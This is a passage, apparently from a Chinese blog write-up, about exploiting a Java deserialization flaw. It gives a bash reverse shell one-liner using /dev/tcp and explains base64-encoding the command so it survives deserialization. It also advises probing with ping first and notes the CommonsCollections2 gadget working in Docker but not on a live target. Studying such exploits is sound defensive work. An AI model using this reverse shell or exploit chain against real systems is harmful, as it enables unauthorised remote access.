接下来就是反弹shell了
linux下反弹shell命令如下:
bash -i >& /dev/tcp/127.0.0.1/8888 0>&1
这里需要将反弹shell的命令进行java base64...关于反弹shell命令, 如果不编码会命令执行失败....本人在网上阅读大佬们写的相关文章后, 理解了一点, 简单说就是反弹shell的命令中包含一些特殊的符号, 在进行反序列化的时候会导致命令无法正常解析, 反正编码就完事了....测试时, 最好先使用ping命令用来检测漏洞是否存在, 因为复杂的命令可能因为各种原因执行失败, 影响判断....关于利用模块的选择, 最开始在docker上复现时, 我使用的是CommonsCollections2, 都能成功, 但到了实际环境中, 反弹shell一直执行不成功, 我又是不停的找资料看, 问朋友,